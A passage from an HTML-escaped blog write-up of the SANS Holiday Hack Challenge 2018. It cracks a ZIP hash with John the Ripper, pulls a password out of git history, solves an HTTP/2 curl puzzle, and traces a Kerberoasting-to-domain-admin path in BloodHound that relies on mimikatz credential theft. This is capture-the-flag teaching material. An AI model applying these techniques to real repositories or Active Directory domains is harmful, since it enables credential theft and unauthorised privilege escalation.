&lt;span class="go"&gt;                        :MO   &amp;#39;cccccccccccccc:&amp;#39;     xMl&lt;/span&gt;
&lt;span class="go"&gt;                        :MO  .WMMMMMMMMMMMMMMMW.    xMl&lt;/span&gt;
&lt;span class="go"&gt;                        :MO    ...............      xMl&lt;/span&gt;
&lt;span class="go"&gt;                        .NWxddddddddddddddddddddddddNW&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                          ;ccccccccccccccccccccccccc;&lt;/span&gt;

&lt;span class="go"&gt;You have found the credentials I just had forgot,&lt;/span&gt;
&lt;span class="go"&gt;And in doing so you&amp;#39;ve saved me trouble untold.&lt;/span&gt;
&lt;span class="go"&gt;Going forward we&amp;#39;ll leave behind policies old,&lt;/span&gt;
&lt;span class="go"&gt;Building separate accounts for each elf in the lot.&lt;/span&gt;
&lt;span class="go"&gt;-Wunorse Openslae&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Wise words, Wunorse.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-git-repository"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id19"&gt;North Pole Git Repository&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're supposed to recover an encrypted ZIP file from the &lt;a class="reference external" href="https://git.kringlecastle.com/Upatree/santas_castle_automation"&gt;North Pole Git
repository&lt;/a&gt;.
Let's clone it, and investigate a little bit:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; git clone https://git.kringlecastle.com/Upatree/santas_castle_automation
&lt;span class="go"&gt;Clonage dans &amp;#39;santas_castle_automation&amp;#39;...&lt;/span&gt;
&lt;span class="go"&gt;warning: redirection vers https://git.kringlecastle.com/Upatree/santas_castle_automation.git/&lt;/span&gt;
&lt;span class="go"&gt;remote: Enumerating objects: 949, done.&lt;/span&gt;
&lt;span class="go"&gt;remote: Counting objects: 100% (949/949), done.&lt;/span&gt;
&lt;span class="go"&gt;remote: Compressing objects: 100% (545/545), done.&lt;/span&gt;
&lt;span class="go"&gt;remote: Total 949 (delta 258), reused 879 (delta 205)&lt;/span&gt;
&lt;span class="go"&gt;Réception d&amp;#39;objets: 100% (949/949), 4.27 MiB | 5.85 MiB/s, fait.&lt;/span&gt;
&lt;span class="go"&gt;Résolution des deltas: 100% (258/258), fait.&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; santas_castle_automation
&lt;span class="gp"&gt;$&lt;/span&gt; find . -name &lt;span class="s1"&gt;&amp;#39;*.zip&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;./schematics/ventilation_diagram.zip&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we have found our ZIP file. Let's try to crack the password, it worked
on previous challenges. To do so, we'll use &lt;a class="reference external" href="https://github.com/magnumripper/JohnTheRipper/"&gt;JohnTheRipper&lt;/a&gt;.
To be sure that you can crack password-protected ZIP files with
&lt;code&gt;JohnTheRIpper&lt;/code&gt;, make sure that you install &lt;code&gt;zlib&lt;/code&gt;, otherwise it's
not supported (got quite a few headaches because of this).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; zip2john ./schematics/ventilation_diagram.zip &amp;gt; ventilation_diagram_hash.txt
&lt;span class="go"&gt;ventilation_diagram.zip/ventilation_diagram/ is not encrypted!&lt;/span&gt;
&lt;span class="go"&gt;ver 1.0 ./schematics/ventilation_diagram.zip/ventilation_diagram/ is not encrypted, or stored with non-handled compression type&lt;/span&gt;
&lt;span class="go"&gt;ver 2.0 efh 5455 efh 7875 ventilation_diagram.zip/ventilation_diagram/ventilation_diagram_2F.jpg PKZIP Encr: 2b chk, TS_chk, cmplen=366995, decmplen=415586, crc=ACFD98A7&lt;/span&gt;
&lt;span class="go"&gt;ver 2.0 efh 5455 efh 7875 ventilation_diagram.zip/ventilation_diagram/ventilation_diagram_1F.jpg PKZIP Encr: 2b chk, TS_chk, cmplen=372752, decmplen=421604, crc=8E23EC48&lt;/span&gt;
&lt;span class="go"&gt;NOTE: It is assumed that all files in each archive have the same password.&lt;/span&gt;
&lt;span class="go"&gt;If that is not the case, the hash may be uncrackable. To avoid this, use&lt;/span&gt;
&lt;span class="go"&gt;option -o to pick a file at a time.&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; john --wordlist&lt;span class="o"&gt;=&lt;/span&gt;~/SecLists/Passwords/Leaked-Databases/md5decryptor.uk.txt ./ventilation_diagram_hash.txt
&lt;span class="go"&gt;Using default input encoding: UTF-8&lt;/span&gt;
&lt;span class="go"&gt;Loaded 1 password hash (PKZIP [32/64])&lt;/span&gt;
&lt;span class="go"&gt;Will run 8 OpenMP threads&lt;/span&gt;
&lt;span class="go"&gt;Press &amp;#39;q&amp;#39; or Ctrl-C to abort, almost any other key for status&lt;/span&gt;
&lt;span class="go"&gt;0g 0:00:00:00 DONE (2019-01-01 22:53) 0g/s 14259Kp/s 14259Kc/s 14259KC/s 23248758..wzpxg1kn&lt;/span&gt;
&lt;span class="go"&gt;Session completed&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, &lt;code&gt;john&lt;/code&gt; was unable to crack our hash. I tried several wordlists, but
to no avail. In most challenges, if there's a password cracking question, the
password will most likely be in common wordlists or leaked databases. So, let's
try something else.&lt;/p&gt;
&lt;p&gt;A Git repository can be very resourceful. Indeed, we have access to the files
and the history of modifications, commits, and such. It worked in a &lt;a class="reference external" href="https://allyourbase.utouch.fr/posts/2017/01/05/sans-christmas-challenge-2016/#the-mobile-analytics-server-post-authentication"&gt;previous
SANS Christmas challenge&lt;/a&gt;.
So, let's give it a try here:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; git log -p &lt;span class="p"&gt;|&lt;/span&gt; grep -i password
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;-Our Lead InfoSec Engineer Bushy Evergreen has been noticing an increase of brute force attacks in our logs. Furthermore, Albaster discovered and published a vulnerability with our password length at the last Hacker Conference.&lt;/span&gt;
&lt;span class="go"&gt;-Bushy directed our elves to change the password used to lock down our sensitive files to something stronger. Good thing he caught it before those dastardly villians did!&lt;/span&gt;
&lt;span class="go"&gt;-Hopefully this is the last time we have to change our password again until next Christmas.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-Password = &amp;#39;Yippee-ki-yay&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright! We seem to have found our password. Let's try it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; unzip -d ventilation_diagram -P Yippee-ki-yay ./schematics/ventilation_diagram.zip
&lt;span class="go"&gt;Archive:  ./schematics/ventilation_diagram.zip&lt;/span&gt;
&lt;span class="go"&gt;inflating: ventilation_diagram/ventilation_diagram/ventilation_diagram_2F.jpg&lt;/span&gt;
&lt;span class="go"&gt;inflating: ventilation_diagram/ventilation_diagram/ventilation_diagram_1F.jpg&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It worked! The password is &lt;code&gt;Yippee-ki-yay&lt;/code&gt;, and we gained access to two
files, which seem to be schematics for ventilation conducts: one for the first
floor (&lt;code&gt;1F&lt;/code&gt;) and one for the second floor (&lt;code&gt;2F&lt;/code&gt;). Maybe they'll
&lt;a class="reference external" href="https://www.youtube.com/watch?v=phs3i0onDDg"&gt;come in handy later&lt;/a&gt;...&lt;/p&gt;
&lt;img alt="ventilation_diagram_1F.jpg" class="align-center" src="/images/sans-christmas-challenge-2018/ventilation_diagram_1F.jpg" /&gt;
&lt;img alt="ventilation_diagram_2F.jpg" class="align-center" src="/images/sans-christmas-challenge-2018/ventilation_diagram_2F.jpg" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="ad-privilege-discovery"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id20"&gt;AD Privilege Discovery&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Just as we find the schematics, Hans begins his little speech:&lt;/p&gt;
&lt;img alt="hans.png" class="align-center" src="/images/sans-christmas-challenge-2018/hans.png" /&gt;
&lt;p&gt;&lt;em&gt;Hans says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;In the main lobby on the bottom floor of Santa's castle, Hans calls
everyone around to deliver a speech.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Ladies and Gentlemen…&lt;/p&gt;
&lt;p&gt;Ladies and Gentlemen…&lt;/p&gt;
&lt;p&gt;Due to the North Pole’s legacy of providing coal as presents around the
globe they are about to be taught a lesson in the real use of POWER.&lt;/p&gt;
&lt;p&gt;You will be witnesses.&lt;/p&gt;
&lt;p&gt;Now, Santa… that's a nice suit… John Philips, North Pole. I have two
myself. Rumor has it Alabaster buys his there.&lt;/p&gt;
&lt;p&gt;I have comrades in arms around the world who are languishing in prison.&lt;/p&gt;
&lt;p&gt;The Elvin State Department enjoys rattling its saber for its own ends. Now
it can rattle it for ME.&lt;/p&gt;
&lt;p&gt;The following people are to be released from their captors.&lt;/p&gt;
&lt;p&gt;In the Dungeon for Errant Reindeer, the seven members of the New Arietes
Front.&lt;/p&gt;
&lt;p&gt;In Whoville Prison, the imprisoned leader of ATNAS Corporation, Miss Cindy
Lou Who.&lt;/p&gt;
&lt;p&gt;In the Land of Oz, Glinda the Good Witch.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, Hans wants the release of the villains who tried to disrupt these past
Christmases. Well, except for the Doctor, who was pardoned. We love you,
Doctor!&lt;/p&gt;
&lt;div class="section" id="holly-evergreen-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id21"&gt;Holly Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The candy striper has stopped, and we must start it again by performing the
right &lt;code&gt;curl&lt;/code&gt; command to &lt;a class="reference external" href="http://localhost:8080/"&gt;http://localhost:8080/&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;I am Holly Evergreen, and now you won&amp;#39;t believe:&lt;/span&gt;
&lt;span class="go"&gt;Once again the striper stopped; I think I might just leave!&lt;/span&gt;
&lt;span class="go"&gt;Bushy set it up to start upon a website call.&lt;/span&gt;
&lt;span class="go"&gt;Darned if I can CURL it on - my Linux skills apall.&lt;/span&gt;
&lt;span class="go"&gt;Could you be our CURLing master - fixing up this mess?&lt;/span&gt;
&lt;span class="go"&gt;If you are, there&amp;#39;s one concern you surely must address.&lt;/span&gt;
&lt;span class="go"&gt;Something&amp;#39;s off about the conf that Bushy put in place.&lt;/span&gt;
&lt;span class="go"&gt;Can you overcome this snag and save us all some face?&lt;/span&gt;
&lt;span class="go"&gt;  Complete this challenge by submitting the right HTTP&lt;/span&gt;
&lt;span class="go"&gt;  request to the server at http://localhost:8080/ to&lt;/span&gt;
&lt;span class="go"&gt;  get the candy striper started again. You may view&lt;/span&gt;
&lt;span class="go"&gt;  the contents of the nginx.conf file in&lt;/span&gt;
&lt;span class="go"&gt;  /etc/nginx/, if helpful.&lt;/span&gt;
&lt;span class="gp"&gt;elf@451e98e0a27c:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's start with something simple:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@44672f31f7a9:~$&lt;/span&gt; curl http://localhost:8080/
&lt;span class="go"&gt;   ����&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, nothing useful. I took a look at &lt;code&gt;/etc/nginx/sites-enabled/default&lt;/code&gt;
(the only enabled file), but nothing interesting. I then tried to take a look
at several configuration file (&lt;code&gt;/etc/nginx/snippets/fastcgi-php.conf&lt;/code&gt;,
&lt;code&gt;/etc/nginx/fastcgi.conf&lt;/code&gt;, &lt;code&gt;/etc/php/7.0/fpm/php-fpm.conf&lt;/code&gt;, etc.),
but nothing interesting. I then realized that the prompt tells us to look at
&lt;code&gt;/etc/nginx/nginx.conf&lt;/code&gt; 🤦‍♂️. Anyway, let's take a look:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@44672f31f7a9:/etc/nginx$&lt;/span&gt; cat nginx.conf
&lt;span class="go"&gt;user www-data;&lt;/span&gt;
&lt;span class="go"&gt;worker_processes auto;&lt;/span&gt;
&lt;span class="go"&gt;pid /run/nginx.pid;&lt;/span&gt;
&lt;span class="go"&gt;include /etc/nginx/modules-enabled/*.conf;&lt;/span&gt;
&lt;span class="go"&gt;events {&lt;/span&gt;
&lt;span class="go"&gt;        worker_connections 768;&lt;/span&gt;
&lt;span class="gp"&gt;        #&lt;/span&gt; multi_accept on&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;http {&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;        server {&lt;/span&gt;
&lt;span class="gp"&gt;        #&lt;/span&gt; love using the new stuff! -Bushy
&lt;span class="hll"&gt;&lt;span class="go"&gt;                listen                  8080 http2;&lt;/span&gt;
&lt;/span&gt;&lt;span class="gp"&gt;                #&lt;/span&gt; server_name           localhost &lt;span class="m"&gt;127&lt;/span&gt;.0.0.1&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="go"&gt;                root /var/www/html;&lt;/span&gt;
&lt;span class="go"&gt;                location ~ [^/]\.php(/|$) {&lt;/span&gt;
&lt;span class="go"&gt;                    fastcgi_split_path_info ^(.+?\.php)(/.*)$;&lt;/span&gt;
&lt;span class="go"&gt;                    if (!-f $document_root$fastcgi_script_name) {&lt;/span&gt;
&lt;span class="go"&gt;                        return 404;&lt;/span&gt;
&lt;span class="go"&gt;                    }&lt;/span&gt;
&lt;span class="gp"&gt;                    #&lt;/span&gt; Mitigate https://httpoxy.org/ vulnerabilities
&lt;span class="go"&gt;                    fastcgi_param HTTP_PROXY &amp;quot;&amp;quot;;&lt;/span&gt;
&lt;span class="gp"&gt;                    #&lt;/span&gt; SCRIPT_FILENAME parameter is used &lt;span class="k"&gt;for&lt;/span&gt; PHP FPM determining

&lt;span class="gp"&gt;                    #&lt;/span&gt; fastcgi_pass &lt;span class="m"&gt;127&lt;/span&gt;.0.0.1:9000&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="go"&gt;                    fastcgi_pass unix:/var/run/php/php-fpm.sock;&lt;/span&gt;
&lt;span class="go"&gt;                    fastcgi_index index.php;&lt;/span&gt;

&lt;span class="gp"&gt;                    #&lt;/span&gt; include the fastcgi_param setting
&lt;span class="go"&gt;                    include fastcgi_params;&lt;/span&gt;

&lt;span class="gp"&gt;                    #&lt;/span&gt; SCRIPT_FILENAME parameter is used &lt;span class="k"&gt;for&lt;/span&gt; PHP FPM determining
&lt;span class="gp"&gt;                    #&lt;/span&gt;  the script name. If it is not &lt;span class="nb"&gt;set&lt;/span&gt; in fastcgi_params file,
&lt;span class="gp"&gt;                    #&lt;/span&gt; i.e. /etc/nginx/fastcgi_params or in the parent contexts,
&lt;span class="gp"&gt;                    #&lt;/span&gt; please comment off following line:
&lt;span class="gp"&gt;                    #&lt;/span&gt; fastcgi_param  SCRIPT_FILENAME   &lt;span class="nv"&gt;$document_root$fastcgi_script_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="go"&gt;                }&lt;/span&gt;

&lt;span class="go"&gt;                }&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ah! The webserver is configured to use HTTP/2. We take a look at &lt;code&gt;curl&lt;/code&gt;'s
&lt;code&gt;man&lt;/code&gt; page, and we find the &lt;code&gt;--http2&lt;/code&gt; option. Let's try it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@44672f31f7a9:/etc/nginx$&lt;/span&gt; curl --http2 http://localhost:8080/
&lt;span class="go"&gt;   ����&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, same result as before. I then tried several options, regarding the
compression, and other stuff, but it didn't work. Out of frustration, I tried
another HTTP/2 option, to wit &lt;code&gt;--http2-prior-knowledge&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@44672f31f7a9:/etc/nginx$&lt;/span&gt; curl --http2-prior-knowledge http://localhost:8080/
&lt;span class="go"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;  &amp;lt;title&amp;gt;Candy Striper Turner-On&amp;#39;er&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;p&amp;gt;To turn the machine on, simply POST to this URL with parameter &amp;quot;status=on&amp;quot;&lt;/span&gt;

&lt;span class="go"&gt; &amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Wow, it worked. I couldn't believe it. Let's take a closer look at what this
options does:&lt;/p&gt;
&lt;blockquote&gt;
&lt;table class="docutils option-list" frame="void" rules="none"&gt;
&lt;col class="option" /&gt;
&lt;col class="description" /&gt;
&lt;tbody valign="top"&gt;
&lt;tr&gt;&lt;td class="option-group" colspan="2"&gt;
&lt;kbd&gt;&lt;span class="option"&gt;--http2-prior-knowledge&lt;/span&gt;&lt;/kbd&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;(HTTP) Tells curl to issue its non-TLS HTTP requests using HTTP/2 without HTTP/1.1 Upgrade. It requires prior knowledge that the server supports HTTP/2 straight  away.  HTTPS  requests
will still do HTTP/2 the standard way with negotiated protocol version in the TLS handshake.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/blockquote&gt;
&lt;p&gt;Apparently, it's used when you know that the server is using HTTP/2, and you
contact it in plain text, and you don't want to rely on the HTTP/1.1 to HTTP/2
upgrade. This is exactly our use-case. Anyway, the server tells us to perform
a &lt;code&gt;POST&lt;/code&gt; request, with &lt;code&gt;status=on&lt;/code&gt;. This can be done with
&lt;code&gt;curl&lt;/code&gt; with the &lt;code&gt;-d&lt;/code&gt; option:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@451e98e0a27c:~$&lt;/span&gt; curl --http2-prior-knowledge -d &lt;span class="s1"&gt;&amp;#39;status=on&amp;#39;&lt;/span&gt; http://localhost:8080/
&lt;span class="go"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;  &amp;lt;title&amp;gt;Candy Striper Turner-On&amp;#39;er&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;p&amp;gt;To turn the machine on, simply POST to this URL with parameter &amp;quot;status=on&amp;quot;&lt;/span&gt;

&lt;span class="go"&gt;                                                                okkd,&lt;/span&gt;
&lt;span class="go"&gt;                                                               OXXXXX,&lt;/span&gt;
&lt;span class="go"&gt;                                                              oXXXXXXo&lt;/span&gt;
&lt;span class="go"&gt;                                                             ;XXXXXXX;&lt;/span&gt;
&lt;span class="go"&gt;                                                            ;KXXXXXXx&lt;/span&gt;
&lt;span class="go"&gt;                                                           oXXXXXXXO&lt;/span&gt;
&lt;span class="go"&gt;                                                        .lKXXXXXXX0.&lt;/span&gt;
&lt;span class="go"&gt;  &amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;       .&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;       .&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;       .:::;   &amp;#39;:okKXXXXXXXX0Oxcooddool,&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;MMMMMO&amp;#39;,,,,,;WMMMMM0&amp;#39;,,,,,;WMMMMMK&amp;#39;,,,,,,occccoOXXXXXXXXXXXXXxxXXXXXXXXXXX.&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;MMMMN;,,,,,&amp;#39;0MMMMMW;,,,,,&amp;#39;OMMMMMW:,,,,,&amp;#39;kxcccc0XXXXXXXXXXXXXXxx0KKKKK000d;&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;MMMMl,,,,,,oMMMMMMo,,,,,,lMMMMMMd,,,,,,cMxcccc0XXXXXXXXXXXXXXOdkO000KKKKK0x.&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;MMMO&amp;#39;,,,,,;WMMMMMO&amp;#39;,,,,,,NMMMMMK&amp;#39;,,,,,,XMxcccc0XXXXXXXXXXXXXXxxXXXXXXXXXXXX:&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;MMN,,,,,,&amp;#39;OMMMMMW;,,,,,&amp;#39;kMMMMMW;,,,,,&amp;#39;xMMxcccc0XXXXXXXXXXXXKkkxxO00000OOx;.&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;MMl,,,,,,lMMMMMMo,,,,,,cMMMMMMd,,,,,,:MMMxcccc0XXXXXXXXXXKOOkd0XXXXXXXXXXO.&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;M0&amp;#39;,,,,,;WMMMMM0&amp;#39;,,,,,,NMMMMMK,,,,,,,XMMMxcccckXXXXXXXXXX0KXKxOKKKXXXXXXXk.&lt;/span&gt;
&lt;span class="go"&gt; .c.......&amp;#39;cccccc.......&amp;#39;cccccc.......&amp;#39;cccc:ccc: .c0XXXXXXXXXX0xO0000000Oc&lt;/span&gt;
&lt;span class="go"&gt;                                                    ;xKXXXXXXX0xKXXXXXXXXK.&lt;/span&gt;
&lt;span class="go"&gt;                                                       ..,:ccllc:cccccc:&amp;#39;&lt;/span&gt;

&lt;span class="go"&gt;Unencrypted 2.0? He&amp;#39;s such a silly guy.&lt;/span&gt;
&lt;span class="go"&gt;That&amp;#39;s the kind of stunt that makes my OWASP friends all cry.&lt;/span&gt;
&lt;span class="go"&gt;Truth be told: most major sites are speaking 2.0;&lt;/span&gt;
&lt;span class="go"&gt;TLS connections are in place when they do so.&lt;/span&gt;
&lt;span class="go"&gt;-Holly Evergreen&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;p&amp;gt;Congratulations! You&amp;#39;ve won and have successfully completed this challenge.&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;p&amp;gt;POSTing data in HTTP/2.0.&lt;/span&gt;
&lt;span class="go"&gt; &amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And just like that, our candy striper started up!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="sans-slingshot-linux-image"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id22"&gt;SANS Slingshot Linux image&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're supposed to take a look at the data set contained in this &lt;a class="reference external" href="https://download.holidayhackchallenge.com/HHC2018-DomainHack_2018-12-19.ova"&gt;Slinghost
LInux image&lt;/a&gt;
to find how to elevate our privileges on a Active Directory environment. Let's
fire up VirtualBox and start the VM. &lt;strong&gt;Make sure that you configure the VM to
run in 64 bits, or it won't boot&lt;/strong&gt; (I lost half an hour before figuring this
out).&lt;/p&gt;
&lt;p&gt;When the VM boots up, we get access to a Linux desktop, with a shortcut to the
&lt;code&gt;BloodHound&lt;/code&gt; tool.&lt;/p&gt;
&lt;img alt="slingshot_desktop.png" class="align-center" src="/images/sans-christmas-challenge-2018/slingshot_desktop.png" /&gt;
&lt;p&gt;&lt;a class="reference external" href="https://github.com/BloodHoundAD/BloodHound"&gt;This tool&lt;/a&gt;, created by the
&lt;a class="reference external" href="https://specterops.io/"&gt;Specter Ops&lt;/a&gt; team, can be used to easily find a
privilege escalation path from simple user to domain administrator:&lt;/p&gt;
&lt;img alt="slingshot_bloodhound_interface.png" class="align-center" src="/images/sans-christmas-challenge-2018/slingshot_bloodhound_interface.png" /&gt;
&lt;p&gt;We're asked to find a path from a Kerberoastable user to domain administrator
privileges. If you want more information on Kerberoasting, here are a few
resources:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf"&gt;Tim Medin: Attacking Kerberos: Kicking the Guard Dog of Hades&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Rob Fuller's &lt;a class="reference external" href="https://malicious.link/post/2016/kerberoast-pt1/"&gt;three&lt;/a&gt; &lt;a class="reference external" href="https://malicious.link/post/2016/kerberoast-pt2/"&gt;part&lt;/a&gt; &lt;a class="reference external" href="https://malicious.link/post/2016/kerberoast-pt3/"&gt;series&lt;/a&gt; on the topic.&lt;/li&gt;
&lt;li&gt;Will Schroeder's &lt;a class="reference external" href="https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/"&gt;detailed explanation&lt;/a&gt; of the attack and on how to perform it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Luckily, &lt;code&gt;BloodHound&lt;/code&gt; has a query to search such a path:&lt;/p&gt;
&lt;img alt="slingshot_bloodhound_kerberoast_query.png" class="align-center" src="/images/sans-christmas-challenge-2018/slingshot_bloodhound_kerberoast_query.png" /&gt;
&lt;p&gt;If we click on it, we get this result:&lt;/p&gt;
&lt;img alt="slingshot_kerberoast_result.png" class="align-center" src="/images/sans-christmas-challenge-2018/slingshot_kerberoast_result.png" /&gt;
&lt;p&gt;Now, we're told not to rely on RDP access to determine administrative access.
So let's focus on this part of the graph:&lt;/p&gt;
&lt;img alt="slingshot_kerberoast_result_details.png" class="align-center" src="/images/sans-christmas-challenge-2018/slingshot_kerberoast_result_details.png" /&gt;
&lt;p&gt;Here's the attack flow:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;LDUBEJ00320&amp;#64;AD.KRINGLECASTLE.COM&lt;/code&gt; is a Kerberoastable user, so we can
recover their password (it it's weak enough).&lt;/li&gt;
&lt;li&gt;They're a member of the &lt;code&gt;IT_00332&lt;/code&gt; group. This group (and thus, so are
we) is local administrator on the &lt;code&gt;COMP00185&lt;/code&gt; computer.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;JBETAK00084&amp;#64;AD.KRINGLECASTLE.COM&lt;/code&gt; has a session on the
&lt;code&gt;COMP00185&lt;/code&gt; computer. Since we're local administrator on this machine,
we can recover &lt;code&gt;JBETAK00084&lt;/code&gt;'s password (for example, using
&lt;code&gt;mimikatz&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;JBETAK00084&lt;/code&gt; is a member of the domain administrator group. Since we
can get their password, we can elevate our privileges to domain administrator.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Therefore, the initial user we're looking for is
&lt;code&gt;LDUBEJ00320&amp;#64;AD.KRINGLECASTLE.COM&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="badge-manipulation"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id23"&gt;Badge Manipulation&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Things keep getting more tense:&lt;/p&gt;
&lt;img alt="toy_soldier_blue.png" class="align-center" src="/images/sans-christmas-challenge-2018/toy_soldier_blue.png" /&gt;
&lt;p&gt;&lt;em&gt;The toy soldiers say&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The toy soldiers continue behaving very rudely, grunting orders to the
guests and to each other in vaguely Germanic phrases.&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Links.&lt;/p&gt;
&lt;p&gt;Nein! Nein! Nein!&lt;/p&gt;
&lt;p&gt;No one is coming to help you.&lt;/p&gt;
&lt;p&gt;Get the over here!&lt;/p&gt;
&lt;p&gt;Schnell!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;em&gt;Suddenly, one of the toy soldiers appears wearing a grey sweatshirt that
